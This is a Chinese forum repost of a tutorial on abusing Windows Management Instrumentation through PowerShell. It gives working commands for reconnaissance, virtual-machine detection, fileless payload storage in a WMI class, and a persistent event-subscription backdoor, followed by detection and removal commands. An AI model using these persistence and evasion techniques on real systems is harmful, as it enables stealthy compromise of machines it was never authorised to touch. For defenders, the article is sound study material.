首页>服务器运维>Web服务器安全>WMI Attacks
回复
« 返回列表
chentaokkk
chentaokkk
U途骑士
U途骑士
  • UID34547
  • 粉丝1
  • 关注0
  • 发帖数1
  • 铜币12枚
  • 威望12点
  • 贡献0点
写私信
阅读:4208回复:0

WMI Attacks

楼主#
更多 发布于:2015-09-08 13:54
◆0 前言



图片:2015082315415719180.png



Matt Graeber在Blackhat中介绍了如何使用WMI并展示其攻击效果,但细节有所保留,所以这一次具体介绍如何通过powershell来实现WMI attacks。

◆1 说明



WMI在内网渗透中最常见的是wmiexec 之前在http://drops.wooyun.org/tips/7358中有提到 因此Remote WMI不做重点介绍

参考链接: https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor.pdf
 https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf


◆2 测试环境



操作系统:win8 x32 powershell v3(win8默认安装) 开启Winmgmt服务,支持WMI

◆3 WMI attacks



注:以下代码均为powershell代码

1、侦查


操作系统相关信息

Get-WmiObject -Namespace ROOTCIMV2 -Class Win32_OperatingSystem
Get-WmiObject -Namespace ROOTCIMV2 -Class Win32_ComputerSystem
Get-WmiObject -Namespace ROOTCIMV2 -Class Win32_BIOS

文件/目录列表

Get-WmiObject -Namespace ROOTCIMV2 -Class CIM_DataFile

磁盘卷列表

Get-WmiObject -Namespace ROOTCIMV2 -Class Win32_Volume

注册表操作

Get-WmiObject -Namespace ROOTDEFAULT -Class StdRegProv
Push-Location HKLM:SOFTWAREMicrosoftWindowsCurrentVersionRun
Get-ItemProperty OptionalComponents

如图

图片:2015082315415719180.png



当前进程

Get-WmiObject -Namespace ROOTCIMV2 -Class Win32_Process

列举服务

Get-WmiObject -Namespace ROOTCIMV2 -Class Win32_Service

日志

Get-WmiObject -Namespace ROOTCIMV2 -Class Win32_NtLogEvent

登陆账户

Get-WmiObject -Namespace ROOTCIMV2 -Class Win32_LoggedOnUser

共享

Get-WmiObject -Namespace ROOTCIMV2 -Class Win32_Share

补丁

Get-WmiObject -Namespace ROOTCIMV2 -Class Win32_QuickFixEngineering

杀毒软件

Get-WmiObject -Namespace rootSecurityCenter2 -Class AntiVirusProduct

2、虚拟机检测


(1)判断TotalPhysicalMemory和NumberOfLogicalProcessors

$VMDetected = $False
$Arguments = @{ Class = 'Win32_ComputerSystem' Filter = 'NumberOfLogicalProcessors < 2 AND TotalPhysicalMemory < 2147483648'
}
if (Get-WmiObject @Arguments) {
$VMDetected = $True
"In vm" } else{ "Not in vm" }

(2)判断虚拟机进程

$VMwareDetected = $False
$VMAdapter = Get-WmiObject Win32_NetworkAdapter -Filter 'Manufacturer LIKE
"%VMware%" OR Name LIKE "%VMware%"'
$VMBios = Get-WmiObject Win32_BIOS -Filter 'SerialNumber LIKE "%VMware%"'
$VMToolsRunning = Get-WmiObject Win32_Process -Filter 'Name="vmtoolsd.exe"'
if ($VMAdapter -or $VMBios -or $VMToolsRunning)
{ $VMwareDetected = $True
"in vm"
}
else
{
"not in vm"
}

3、存储payload


【管理员权限】

$StaticClass = New-Object Management.ManagementClass('rootcimv2', $null,
$null)
$StaticClass.Name = 'Win32_EvilClass'
$StaticClass.Put()
$StaticClass.Properties.Add('EvilProperty' , "This is payload")
$StaticClass.Put()

如图

图片:2015082315415719180.png



Tips:

可加密存储于此位置,执行时解密运行,达到硬盘不存文件的效果

4、隐蔽定时启动程序


【管理员权限】

$filterName = 'BotFilter82'
$consumerName = 'BotConsumer23'
$exePath = 'C:WindowsSystem32notepad.exe'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "rootsubscription" -Arguments @{Name=
$filterName;EventNameSpace="rootcimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "rootsubscription" -Arguments @
{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "rootsubscription" -Arguments @{Filter=
$WMIEventFilter;Consumer=$WMIEventConsumer}

如图

图片:2015082315415719180.png



每60s执行一次notepad.exe

Tips:

之前在Stuxnet上面就使用了这个后门,通过mof实现
至今该后门方法...还有很多人在用
杀毒软件对此行为也不会查杀...

◆4 WMI后门检测及清除 :


1、查看当前WMI Event


【管理员权限】

#List Event Filters
Get-WMIObject -Namespace rootSubscription -Class __EventFilter
#List Event Consumers
Get-WMIObject -Namespace rootSubscription -Class __EventConsumer
#List Event Bindings
Get-WMIObject -Namespace rootSubscription -Class __FilterToConsumerBinding

如图

图片:2015082315415719180.png



2、清除后门


【管理员权限】

#Filter
Get-WMIObject -Namespace rootSubscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose
#Consumer
Get-WMIObject -Namespace rootSubscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose
#Binding
Get-WMIObject -Namespace rootSubscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose

如图

图片:2015082315415719180.png



◆5 总结


实现wmi attacks的不止有powershell,比如

– vbs
– mof
– C/C++ via IWbem* COM API
– .NET System.Management classes

检测方法也有很多,比如查看日志

– Microsoft-Windows-WinRM/Operational
– Microsoft-Windows-WMI-Activity/Operational
– Microsoft-Windows-DistributedCOM

甚至禁用Winmgmt服务从根本上阻止该方法的使用


更多wmi attacks的方法欢迎讨论。

本文由三好学生原创并首发于乌云drops,转载请注明
喜欢14 评分0
回复
游客
关于UPUPW帮助中心技术问答手机浏览相关链接

©2013-2023 UPUPW绿色服务器平台 保留所有权利. 官方唯一网址UPUPW.NET 请勿用此环境运行非法站点,UPUPW不承担相关责任! [京] ICP备07028424号-2

UPUPW ANK V1.1.8正式版驱动 - 页面执行时间0.037167秒

返回顶部